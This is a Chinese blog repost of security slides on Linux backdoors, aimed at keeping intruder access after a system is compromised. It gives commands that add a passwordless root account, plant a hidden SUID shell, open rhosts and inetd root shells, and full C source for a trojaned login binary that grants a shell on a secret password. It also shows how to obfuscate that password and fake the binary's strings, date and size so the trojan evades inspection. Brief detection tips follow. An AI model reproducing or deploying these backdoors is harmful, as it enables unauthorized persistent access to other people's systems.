Linux后门技术及实践

最新推荐文章于 2021-05-16 12:20:34 发布
最新推荐文章于 2021-05-16 12:20:34 发布
阅读量1.1k 收藏 1
点赞数
文章标签: linux login shell 工具 加密 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/276763
版权
Mail: e4gle@whitecell.org
   Page: http://www.whitecell.org
   Copyright: Whitecell Security Systems

概述

  后门简介
  常用后门技术
  后门的检测
  实例讲解:login后门

后门简介

  入侵者完全控制系统后,为方便下次进入
  而采用的一种技术。
  一般通过修改系统配置文件和安装第三方
  后门工具来实现。
  具有隐蔽性,能绕开系统日志,不易被系
  统管理员发现等特点。

常用后门技术

  增加超级用户账号
  破解/嗅探用户密码
  放置SUID Shell
  rhosts + +
  利用系统服务程序
  TCP/UDP/ICMP Shell
  Crontab定时任务
  共享库文件
  工具包rootkit
  可装载内核模块(LKM)

增加超级用户

  # echo "e4gle:x:0:0::/:/bin/sh" >>
  /etc/passwd
  # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>
  /etc/shadow
  如果系统不允许uid=0的用户远程登录,
  还需要增加一个普通用户账号。

破解/嗅探用户密码

  获得shadow文件后,用John the Ripper
  工具破解薄弱的用户密码。
  安装sniffit等嗅探工具,监听telnet、ftp等
  端口,收集用户密码。

放置SUID Shell

  # cp /bin/bash /dev/.rootshell
  # chmod u+s /dev/.rootshell
  普通用户在本机运行/dev/.rootshell,即
  可获得一个root权限的shell。

rhosts + +

  # echo "+ +" > /.rhosts
  # rsh -l root victim.com csh -i
  远程可以得到一个rootshell。

利用系统服务程序

  修改/etc/inetd.conf,
  daytime stream tcp nowait /bin/sh sh -I
  用trojan程序替换in.telnetd、in.rexecd等
  inted的服务程序
  重定向login程序

TCP/UDP/ICMP Shell

  BindShell,大部分是基于TCP/UDP协议
  的网络服务程序,在高端口监听,很容易
  被发现。
  Ping Backdoor,通过ICMP包激活后门,
  形成一个Shell通道。
  TCP ACK数据包后门,能够穿越防火
  墙。

Crontab定时任务

  通过Crontab程序调度已安装的后门程序
  定时运行,一般在深夜时段,是系统管理
  员不在线的时间。

共享库文件

  在共享库中嵌入后门函数
  使用后门口令激活Shell,获得权限
  能够躲避系统管理员对二进制文件本身的
  校验

工具包rootkit

  包含一系列系统及后门工具:
  - 清除日志中的登录记录
  - 伪装校验和
  - 替换netstat、ps等网络工具
  - 后门登录程序
  易于安装和使用

可装载内核模块(LKM)

  LKM:Loadable Kernel Modules
  动态的加载,不需要重新编译内核。
  截获系统调用,具有隐藏目录、文件、进
  程、网络连接等强大功能。
  自身隐蔽性好,发现难度较大。
  著名的LKM包有adore和knark。

后门的检测

  以自己的经验,结合特定的工具,手工作
  一些检测。
  使用Tripwire或md5校验来检查系统。
  借助IDS系统,监听到目标机器的可疑网
  络连接。

实例:login后门

  入侵者先把原始的/bin/login备份,再用一
  段程序替换/bin/login。入侵者telnet登录
  进来的时候,通过环境变量或者终端类型
  传递了正确的后门密码,将直接获得一个
  Shell;如果是普通用户登录,将会重定
  向到原始的login文件,来处理正常的登
  录。
  最简单的login后门ulogin.c源代码如下:

实例:login后门

  #include <stdio.h>
  #define PASSWORD "passWORD"
  #define _PATH_LOGIN "/sbin/logins"

  main (argc, argv, envp)
  int argc;
  char **argv, **envp;
  {
           char *display = getenv("DISPLAY");
           if ( display == NULL ) {
                          execve(_PATH_LOGIN, argv, envp);
                          perror(_PATH_LOGIN);
                          exit(1);
           }
           if (!strcmp(display,PASSWORD)) {
                          system("/bin/csh");
                          exit(1);
           }
           execve(_PATH_LOGIN, argv, envp);
           exit(1);
  }

利用后门登录

  首先Telnet服务是打开的,在自己机器上:
  bash$ export DISPLAY=passWORD
  bash$ telnet victim.com
  Trying xxx.xxx.xxx.xxx...
  Connected to victim.com (xxx.xxx.xxx.xxx).
  Escape character is '^]'.
  % _

strings命令

    strings命令能够打印出二进制文件中的可显示
    字符串,用于刚才的ulogin程序:
    bash$ strings ulogin
    /lib/ld-linux.so.2
    ..............
    DISPLAY
    /sbin/logins
    passWORD
    /bin/csh

加密后门密码(1)

  1,采用DES算法,即crypt( )函数,编写gen.c程序:
  #include <unistd.h>
  main(int argc, char *argv[])
  {
      if (argc != 3) {
        printf("usage: %s <password> <salt>/n", argv[0]);
        exit(1);
     }
      printf("%s/n", crypt(argv[1], argv[2]));
  }

加密后门密码(1)

  2、编译为gen,执行./gen hack ui,得到的shadow结
  果为UiVqMWvDrIQjA。
  3、修改后门源程序ulogin.c:
  -- 以密文形式的密码代替ulogin.c中define的宏
PASSWORD值。
  -- 如果后门密码正确,直接给出Shell:
  if (!strcmp(PASSWORD, crypt(display,PASSWORD)))
  {
       system(SHELL);
       exit(1);
  }
  用strings命令只能看到加密过的密码。

加密后门密码(2)

  采用异或(XOR)算法
  以十六进制方式表示字符串,以达到non-
  printable的效果
  1、编码程序encode.c如下:

加密后门密码(2)

  char magic[]="/x71/x67/x6d/x7a/x65/x61/x7a";
  char *de(char *str,char *key)
  {
  int i=0,j=0,len;
  len=strlen(key);
  while(str[i] != '/0') {
  str[i]^=key[j];
  j++;
  if(j==len) j=0;
  i++;
  }
  return str;
  }
  void display(char *str)
  {
  int i;
  for(i=0;i<strlen(str);i++) printf("//x%x",str[i]);
  printf("/n");
  }
  main()
  {
  char gets[100], *ptr;
  ptr=gets;
  scanf ("%s",ptr);
  de(ptr,magic);display(ptr);
  }

加密后门密码(2)

  2、编译程序encode,依次执行得到关键字符
  串与magic串异或后的结果,例如原始login的文
  件名/sbin/xlogin,经过异或后为:
  /x5e/x14/xf/x13/xb/x4e/x2/x1d/x8/xa/x13/xb
  3、在后门源代码中这样定义:
  Char
  login[]="/x5e/x14/xf/x13/xb/x4e/x2/x1d/x8/xa/x
  13/xb";
  然后插入异或函数char *de()结合同一magic
  串,就能判断出正确的后门密码。
  用strings命令看不到密码、路径等字符串了。

最后的修饰(1)

  使后门程序ulogin的strings输出类似于正
  常login的strings输出,做法为:
  在ulogin.c代码中增加一个字符串数组
  char strings[] ="";,在引号中填入正常
  login程序的strings输出结果。
  以假乱真,增加迷惑性。

最后的修饰(2)

  调整后门程序的文件日期、大小等属性:
  1、日期
  # ls -l /sbin/xlogin
  -r-sr-xr-x root root 19300 Feb 11 1998
  /sbin/xlogin
  # touch -t 199802110000 ulogin
  # _

最后的修饰(2)

  2、调整大小
  # ls -l ulogin /sbin/xlogin
  -r-sr-xr-x root root 7542 Feb 11 1998 ulogin
  -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
  # bc
  19300-7542
  11758
  # dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
  1+0 records in
  1+0 records out
  11758 bytes transferred in 0.000379 secs (31016746
  bytes/sec)
  # cat /tmp/t >> ulogin

Login后门的检测

  使用命令md5sum对现有/bin/login文件作
  校验,与以前的值作比较。
  使用Red Hat Linux的RPM校验:
  # rpm -V util-linux
  在入侵者已经利用后门登录的情况下,
  who是看不到用户的,查看系统进程,查
  找login -h xxx.xxx.xxx.xxx的字样。

iiprogram
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
三种后门技术
dodream的专栏
11-11 1523
 一、反弹木马工作模式:受害者(被植入反弹木马服务端的计算机)每间隔一定时间就发出连接控制端的请求,这个请求一直循环到与控制端成功连接;接下来控制端接受服务端的连接请求,两者之间的信任传输通道建立;最后,控制端做的事情就很普通了——取得受害者的控制权。由于是受害者主动发起的连接,因此防火墙在大多数情况下不会报警,而且这种连接模式还能突破内网与外部建立连接,入侵者就轻易的进入了内部的计算机。
系统是否有后门Linux安全加固之PAM知多少
最新发布
jiangzhuwanshi2008的博客
02-16 2162
前言Linux在新装的系统中,更改用户的密码时可能会遇到以下报错:BAD PASSWORD: The password fails the dictionary check - it is based on a dictionary word这是由于系统会对新密码进行检查,如果系统觉得新密码过于简单或不安全,系统就会报错。如果想继续使用简单的密码,通常可以通过更改/etc/pam.d/sysyst...
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
解析网页后门与网页挂马原理
ygyangguang的专栏
01-08 2316
网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。这无论是对企业的信誉,还是对管理员的技术能力都是沉重的打击。下面笔者结合实例对网页后门及其网页挂马的技术进行解析,知己知彼,拒绝攻击。   一、前置知识  网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。由于这些代码都运行在服务器端,攻击者通过这段精
什么叫系统后门后门与漏洞有什么区别?
阿发你好
08-16 1万+
( Java面试题 | Java学习指南 ) 什么叫系统后门后门与漏洞有什么区别?近年爆发的勒索病毒案例中,被黑客利用的是Windows的后门、还是漏洞? 后门,是一个系统的作者故意留下的、只有作者自己知道的机关。 比如,一个洞府看起来是铜墙铁壁,但是若在它前面前念一声"芝麻开门!"便会在墙壁上凭空打开一个门。这便是一个后门,这是系统的作者故意留下的机关。 再比如,打开手机拨号键...
【权限维持】window服务端常见后门技术
10-20 1212
0x00 前言   未知攻焉知防,攻击者在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者如入无人之境。这里整理一些window服务端常见的后门技术,了解攻击者的常见后门技术,有助于更好去发现服务器安全问题。 常见的后门技术列表: 1、隐藏、克隆账户 2、shift后门 3、启动项、计划任务 4、劫持技术 5、Powershell后门 ...
linux后门分析,浅谈Linux后门技术实践入侵
weixin_34511324的博客
05-13 265
2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin,经过异或后为:\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb3、在后门源代码中这样定义:Charlogin[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";然后插入异或函数char *de...
linux 系统留后门方法+日志清除
收集盒 Book box
11-28 1629
1. setuid  #cp /bin/sh /tmp/.sh  #chmod u+s /tmp/.sh  加上 suid 位到shell上,虽然很简单,但容易被发现  2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd  即给系统增加一个 id 为 0(root)的帐号,无口令。  但管理员很快就可以发现哦!  3.echo "
后门技术Linux LKM Rootkit详细解析
03-04
在本篇文章里, 我们将看到各种不同的后门技术,特别是Linux的可装载内核模块(LKM)。 我们将会发现LKM后门比传统的后门程序更加复杂,更加强大,更不易于被发现。知道这些之后,我们可以制造我们自己的基于LKM的Rootkit程序,主要体现在TCP/IP层, 因为我们相信这是在系统管理员面前最好的隐藏后门的地方。介绍一下已经存在的后门技术, 然后和LKM技术相比较, 最后讨论我么的LKM程序的设计与实现。
linux后门技术实践,Linux后门的两种姿势:suid shell与inetd后门
weixin_32204687的博客
05-16 318
前提:你现在已经是root用户, 想留一个后门。系统环境:dawg:~# uname -aLinux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux1. SUID shell首先, 先切换成为root用户,并执行以下的命令:dawg:~# cp /bin/bash /.wootdawg:~# chmod 4755 /...
UNIX系统后门的安放和日志的擦除(转)
08-11 61
UNIX系统后门的安放和日志的擦除(转)[@more@]当我们通过某种手段控制一个主机时,为了使自己能再次光顾这台计算机,我们通常在这个机器上留下后门,以便我们再次访问.一个做得好的后门,即使在入侵被管理员发现后,仍然能让你再次...
linux后门程序,Linux后门
weixin_30263409的博客
05-07 447
===Linux入侵检测===0.断网1.history查看最近命令执行历史2./var/log/*日志检查3.lastloglast查看登录信息4.netstat-anp查看可疑连接5.lsmod查看加载的模块6.ps-awuxf查看可疑进程7./etc/passwdcrontabshellsshfstab配置文件检查8.find/-perm-0...
***教学之后门
weixin_34406061的博客
08-30 109
***教学之后门篇 2005-04-11 20:12:00  标签:***    [推送到技术圈] 来源:[url]http://www.chinaunix.net/[/url] 下边说的后门LINUX/UNIX系统的初学者没有接触这类操作系统的可能不太好理解,现在我发个简单的Win2000/XP中的自启动"后门"</F...
linux后门源码,linux后门
weixin_29466045的博客
05-12 673
ssh软连接#只有root用户才可以这种方法#拿到root权限后执行ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;#任意密码连接5555端口ssh root@106.13.124.93:5555ssh root@106.13.124.93 -p 5555检测:查看可疑进程# ps aux清除后门:结束进程即可,# kill -s 9 PID添...
Unix系统后门技术指南
Nixawk
08-19 4315
Unix系统后门技术指南 简介 黑客攻入系统后,面临一项艰巨的任务----保留对系统的访问权限.为了获取服务器固定的访问权限,入侵者必须知道服务器的所有弱点.这不是一件容易的事.后门或 木马,能够让黑客长期享有目标主机的访问权限.不过,这不能一概而论;后门可以做很多不同的事情,但它们的主要目的是保持对受限区域的访问权限.后门(又名,暗门)与木马之间存在着差异:黑客攻入系统后,会在系统中放置后门(入侵者用它进一步访问系统),而木马则为黑客提供独立访问的权限(取决于你是否有权限).入侵者如果不知道如何再次攻
Linux后门技术零距离接触(转)
cudao7505664的专栏
08-10 73
Linux后门技术零距离接触(转)[@more@]  或许大家还在研究win系统系列的漏洞,比如拿1433端口找一写小小的国内的win肉鸡.当时我在奇怪,你们这样合适吗?自己拿自己国家的机器来攻击入侵不觉得脸红吗?还有最近也就5...
Web安全深度解析:攻防技术实践
内网渗透部分涵盖了Windows和Linux内网环境的渗透技术,包括后门技术及各种综合渗透技巧,为安全专家提供了实用的实战技能。 最后的防御技术章节,提到了团队建设、红蓝对抗模拟演练、安全开发的最佳实践以及安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值